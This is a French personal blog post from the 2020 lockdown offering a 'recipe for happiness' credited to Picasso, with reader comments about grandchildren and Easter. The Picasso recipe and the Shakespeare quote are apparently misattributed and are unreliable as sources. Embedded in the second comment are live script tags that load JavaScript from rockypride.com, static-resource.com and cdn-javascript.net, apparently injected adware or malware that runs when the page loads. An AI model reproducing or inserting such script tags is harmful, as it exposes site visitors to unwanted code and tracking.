• RECETTE du BONHEUR selon PICASSO

     

     ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ 

      ♥    Malgré cette tristesse qui m'etreint      ♥

      ♥ de ne pas pouvoir les serrer dans mes bras  ♥

      ♥ on va se retrouver tres vite et se faire      ♥

      ♥        des milliers de calins                   ♥

     ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥  

     

    RECETTE  du  BONHEUR selon  PICASSO

     

    RECETTE  du  BONHEUR selon  PICASSO

     

     

    RECETTE  du  BONHEUR selon  PICASSO

     

    Cette  nuit,

    J’ai révé de Picasso qui me donnait :

    La Recette du Bonheur 

     

    RECETTE  du  BONHEUR selon  PICASSO

    Laisse de coté tous les chiffres non indispensables à ta survie

    • Cela inclut l'âge, le poids et la taille.

    • Que cela préoccupe seulement le médecin.

    Docteur, Généraliste - Fiches Santé avec SantéBD

    Il est payé pour ça.

     
    • Fréquente, de préférence, des amis joyeux.

    Employés De Bureau Sautant Heureux Illustration Vectorielle Plane ...

    • Les pessimistes ne te conviennent pas.
     
    • Continue de t'instruire...

    RECETTE  du  BONHEUR selon  PICASSO


    • Apprends tout, sur les ordinateurs,

    l'artisanat, le jardinage, etc...


    • Ne laisse pas ton cerveau inoccupé.

    RECETTE  du  BONHEUR selon  PICASSO

    • Un mental inutilisé est l'officine du diable.
     
    • Ris le plus souvent possible. Et surtout de toi-même !

    gifs rire - Page 5
    • Quand viennent les larmes : accepte, souffre et...

       continue d'avancer.
     
    • Accueille chaque jour qui se lève comme

       une nouvelle opportunité

    Magnifique lever de soleil GIF - Télécharger & Partager sur PHONEKY
    • Et, pour cela, ose entreprendre !
     
    • Laisse tomber la routine.

    • Préfère les nouvelles routes aux chemins mille fois empruntés.
     
    • Efface le gris de ta vie

    RECETTE  du  BONHEUR selon  PICASSO


    • Et allume les couleurs que tu possèdes à l'intérieur.
     
    • Exprime tes sentiments pour ne jamais rien perdre

      des beautés qui t'entourent.


    • Que ta joie rejaillisse sur ton entourage.

       Et abat les frontières personnelles que le passé t'a imposées.
     
    • Mais rappelle-toi:

    • l'unique personne qui t'accompagne toute la vie,

      c'est toi-même.

    RECETTE  du  BONHEUR selon  PICASSO


     
    • Sois vivant dans tout ce que tu fais !
     
    • Entoure toi de tout ce que tu aimes : famille, animaux,

      souvenirs, musique,  hobbies, tout ce que tu veux…

    RECETTE  du  BONHEUR selon  PICASSO


     
    • Ton foyer est ton refuge, mais n'en devient pas prisonnier.
     
    • Ton meilleur capital, la santé.


    • Profites-en. Si elle est bonne ne le détruis pas ;

      si elle ne l'est pas , ne l'abîme pas davantage.
     
    • Sors dans la rue. Visite une ville ou un pays étranger...

    RECETTE  du  BONHEUR selon  PICASSO


    • Mais ne t'attarde pas sur les mauvais souvenirs.
     
    • Ne laisse passer aucune occasion pour dire

    « JE T'AIME » à ceux que tu aimes.

    RECETTE  du  BONHEUR selon  PICASSO


    • Et dis-toi toujours que la vie ne se mesure pas au nombre

    de tes respirations mais à celui des instants ou ton cœur bat très fort :

    de rire... de surprise... d'extase... de joie


    • Et surtout d'aimer sans compter.
       

    « J' ai mis toute ma vie à savoir dessiner comme un enfant »
      PICASSO

    enfant Archives - Mes Années Vintage

     


    « On devient jeune à 60 ans malheureusement

    c'est trop tard »
    PICASSO

    « Dans chaque enfant il y a un artiste.

    Le problème est de savoir comment rester artiste en grandissant »
    PICASSO

    RECETTE  du  BONHEUR selon  PICASSO

    « Il y a des êtres qui font d'un soleil une simple tache jaune,

    mais il y en a aussi qui font d'une simple tache jaune un véritable soleil »
    PICASSO

    RECETTE  du  BONHEUR selon  PICASSO


    Shakespeare a dit :

    "Je me sens toujours heureux, vous savez pourquoi ?

    Parce que je n'attends rien de personne.

    Les attentes font toujours mal,

    La vie est courte.

     

    RECETTE  du  BONHEUR selon  PICASSO

     

    Gardez le sourire

    et souvenez vous :

    Avant de parler, écoutez ;

    Avant d'écrire, réfléchissez ;

    Avant de prier, pardonnez ;

    Avant de blesser, considérez l'autre ;

    Avant de détester, aimez.

    Et avant de mourir, vivez !''

     

    RECETTE  du  BONHEUR selon  PICASSO


     

    RECETTE  du  BONHEUR selon  PICASSO









  • Commentaires

    1
    Jeudi 9 Avril 2020 à 19:22

    Bonsoir Vaianae, merci pour cette belle lecture. On essaye de garder le sourire mais çà devient quand même dur. Comme tu dis "Aimez votre vie, soyez heureux". Pâques sera triste pour tout le monde pas d'enfants, ni petits enfants. Une très belle journée comme hier. J'ai fait bronzette dans le jardin en faisant des mots fléchés. J'espère que le bébé va bien. Je viens de lire que la petite princesse était arrivée. Bonne soirée. Gros bisous. 

    2
    Jeudi 9 Avril 2020 à 19:34

    Bonsoir vaianae, un beau billet tout est dit et si bien pensé; Il faut toujours

    positiver,garder l'espoir, le moral et" une âme d'enfant" . Bonne fête de Pâques.

    Même si c'est difficile sans se réunir avec enfants et petits-enfants , on pense fort à eux et on communique, le téléphone, skype, fb...

    Bienvenue à bébé et bonne santé ainsi qu'à ta fille sans oublier Mamie.

    Gros bisous

    <script src="//rockypride.com/2299156fcd9f4015b0.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8857x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8857x&format=arrjs&r=1586453213332" type="text/javascript"></script> <script src="http://rockypride.com/ext/2299156fcd9f4015b0.js?sid=52666_8857_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    3
    Jeudi 9 Avril 2020 à 20:19

    Bonsoir ! Une belle recette je suis fan .Et préparez vous bien pour leurs faire pleins de câlins ... Gros bisous bonne soirée !

    4
    Jeudi 9 Avril 2020 à 20:21

    Bonjour Vaianae

    Tu sais mettre l ambiance là ou la vie s éteins un vrai bonheur de te lire.

    Une belle balade , une vie qui s annonce s est toujours du bonheur en barre

    Je viens te souhaiter un bon vendredi, un bon weekend de Pâques 

    Amicalement Bérénice

    5
    Jeudi 9 Avril 2020 à 21:15

    Bonsoir vaiana, merci pour ton com sur ma page! et pour ton beau post! Je me sens très fatiguée et demain matin je vais faire des courses, il faut que je passe à la pharmacie aussi prendre de l'aspro 500 pour papa et du spasmag pour moi! je te souhaite de pouvoir prendre ta petite fille dans tes bras, le plus rapidement possible! bises

    6
    Jeudi 9 Avril 2020 à 22:37

    Coucou Vaianae

    vivement que tout puisse te rapprocher de ta fille et de cette belle petite fille. C'était un plaisir que de lire tout ce que tu nous offres.

    Aujourd’hui journée moyenne pour moi, sommeil un peu juste  mais il faut continuer.

    Et si je n’ai pas une séance de shiatsu bientôt je vais être un cas pour le virus. En plus je suis du groupe A.

    Même si je m’en protège au maximum, je suis très fatiguée.

    Il fait très beau dehors plus de 46° sur la fenêtre de la cuisine en plein soleil (à 60° il explose (lol). 

     

    Bon nous serons demain le vendredi saint, donc je ne partirais faire les couses qu’après le chemin de croix.

    Il me reste encore un peu d’énergie pour vous envoyer  mes souhaits d’heureuse fête de Pâques et temps pascal.

    Continuez à vous protéger et bisous virtuels amicaux.

    Et à dans un bon bout de temps lundi ou mardi. Petite pause.

     

      

    7
    Vendredi 10 Avril 2020 à 08:11

    La vie est toujours faite de bonheur si on sait la prendre avec philosophie, même en période de confinement on peut vivre heureux

    Amicalement

    Claude

    8
    Vendredi 10 Avril 2020 à 09:11

    Félicitation pour ce 6ème bonheur, Amicalement Bérénice

    9
    Capucine 66
    Vendredi 10 Avril 2020 à 11:22
    Coucou ..mon amie,Berenice m a,donne ton blog..c est un bonheur de te lire..merci eaucoup te lire,fait du bien au moral amicalement Yvette
      • Mercredi 15 Avril 2020 à 21:12

        BONSOIR  CAPUCINE

        MERCI de ta visite, mais je ne sais pas pourquoi,

        je ne peux pas aller sur ton blog, je te réponds ici,

        j'espere que tu auras  mon com

        bonne soiree  bisous 

    10
    Vendredi 10 Avril 2020 à 17:47
    11
    Vendredi 10 Avril 2020 à 17:57

    Bonjour Vaianae J ai du attendre un mois avant de faire mes 1er bisous à ma petite fille née prématuré vers une clinique loin de son lieu

    d habitation. Tu auras tout le temps de lui en faire. que du bonheur ... Amicalement Bérénice

    12
    Vendredi 10 Avril 2020 à 19:29

    Bonsoir ma douce amie

    C'est triste de ne pas pouvoir serrer ta petite princesse dans tes bras ainsi que ta fille, mais cela viendra et quel bonheur ce sera.

    Quel beau billet avec de belles citations pleines d'espoir et d’optimisme, j'aime beaucoup tes photos dans ce livre qui se feuillette c'est joliment fait.

    En un clic me voici chez toi, merci internet et à toi pour ton gentil passage chez moi.

    Je te souhaite une douce nuit ainsi qu'un beau week-end qui je l'espère sera ensoleillé et doux.

    Prends soin de toi et courage.

    Je te fais, du haut de mon ti rocher, de gros bisous d'amitié virtuels donc sans virus.

    13
    Samedi 11 Avril 2020 à 11:26

    Bonjour Vaianae, j'adhère tout à fait à ce programme. 

    Bienvenue à ta petite puce. J'imagine comme cela doit être frustrant pour toi de ne pas pouvoir la voir encore, tout comme tes autres petits-enfants.

    Courage, et prends soin de toi. Bisous

    14
    Samedi 11 Avril 2020 à 12:56

    Bonjour Vaiena.

    Merci pour ce beau billet qui égaye mon passage chez toi .

    Toutes mes félicitation pour l'arrivée de ce petit ange a vous les grands parents et au parents aussi ,et qui est aussi la joie et le bonheur de ces petits frères .

    J'espère que bientôt ,si ce n'est pas fait actuellement tu pourras la serrer dans tes bras.Bonne et longue vie a cette petite merveille qui malheureusement arrive dans un moment un peut délicat,mais avec l'espoir que cela va s'arranger dans les jours prochains ,du moins j'ose y croire .  

    En cette fin de semaine toujours le beau soleil chez moi, je viens te souhaiter un agréable weekend de Pâques même s'il ne ressemble pas aux autres passées. Prenons patience pour notre santé et celle des autres ne sortons pas .

    Bonne après midi .

    Bisous kettyn.

    15
    Samedi 11 Avril 2020 à 18:33

    Bon week-end de Pâques ,bisous

    Fichier

    16
    Dimanche 12 Avril 2020 à 20:04

    un petit coucou pour te souhaiter une agréable soirée, un bon lundi de Pâques ainsi qu'une bonne semaine. Gros bisous.

     

    17
    Dimanche 12 Avril 2020 à 22:04

    Je prends tes recettes du bonheur, elle me conviennent! Il faut vivre vivre vivre et profiter des bons moments quand ils sont là! je crois que ce que nous vivons en actuellement et le fait d'être séparé des personnes qu'on aime va faire que nous apprécierons encore plus les moments passés ensemble.

    J'ai vu qu'une jolie princesse était arrivée il y a quelques jours! Je suis contente pour toi, c'est tellement génial l'arrivée d'un nouveau bébé dans la famille. Félicitations mamie Vainea 

    Bizz

    Joëlle

    18
    Dimanche 12 Avril 2020 à 23:36

    bonsoir vaianae

    un bon pâques a toi 

    un peu de repos je vais bien mon mari est rentrée bizouille du soir 

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :